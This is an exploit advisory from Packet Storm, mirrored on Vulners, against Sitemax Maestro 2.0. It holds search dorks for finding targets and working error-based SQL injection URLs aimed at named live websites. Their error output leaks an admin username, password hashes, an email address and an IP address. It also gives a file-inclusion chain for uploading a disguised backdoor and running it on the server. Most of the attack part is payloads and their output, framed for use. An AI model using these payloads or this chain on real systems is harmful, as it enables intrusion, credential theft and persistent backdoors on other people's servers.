Lucene search
K

Sitemax Maestro 2.0 SQL Injection / Local File Inclusion

🗓️ 03 Sep 2012 00:00:00Reported by AkastepType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

Vulnerability in Sitemax Maestro 2.0 – SQL Injection & Local File Inclusio

Code
`========================================  
Vulnerable Software: Sitemax Maestro v. 2.0 (from http://sitemax.am/)  
Sitemax Maestro v. 2.0  
Vendor: http://sitemax.am/  
License Type: Commercial  
Discovered and Exploited in Wild  
=========================================  
Dork 1:  
site:am pages.php?al=  
  
Dork 2:  
site:am swlang.php  
  
Dork: 3  
  
Designed and developed by SiteMax IT  
Sitemax Maestro v. 2.0  
  
=========================================  
  
  
Error based Blind SQLi:  
  
  
http://megasport.am/pages.php?al=100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1  
  
http://megasport.am/maestro/ <== Admin Panel  
  
  
Megasport  
2012-09-03 05:51  
Fatal error : SQL error : Duplicate entry 'admin|1a90712bbe24c5142e13fe9d7a98e6031' for key 1  
SELECT * FROM sed_zpages WHERE alias='100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1' and _level_ >= 1  
  
  
  
  
If the MYSQL v >5.1 you can use this way also:(Funny pow() failure ;))  
  
http://site.tld/pages.php?al=100000000000000000000000000' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1  
  
  
Demo 2 and New technique:  
  
  
http://armenbrok.am/pages.php?al=contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1  
  
  
2012-09-02 19:59  
Fatal error : SQL error : DOUBLE value is out of range in 'pow((hex((select concat_ws('admin','e6053eb8d35e02ae40beeeacef203c1a','[email protected]','130.193.121.51') from dual limit 1))),(rand() * 1e100))'  
SELECT * FROM sed_zpages WHERE alias='contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1' AND visible='1' LIMIT 1  
  
  
  
Local File Inclusion:  
  
After gain access to admin panel: Upload your backdoor as backdoor.gif file using site.am/pfs.php  
  
Then include it: site.am/swlang.php?lang=../../datas/users/3-fuck.gif%00&redirect=L2FkbWluLnBocA==  
  
  
  
Enjoy with your backdoor on server)  
  
  
  
  
SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:  
===========================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
exploit-db.com  
to all AA Team + to all Azerbaijan Black HatZ +  
*Especially to my bro CAMOUFL4G3.*  
===========================================================  
  
/AkaStep & BOT_25 & HERO_AZE  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation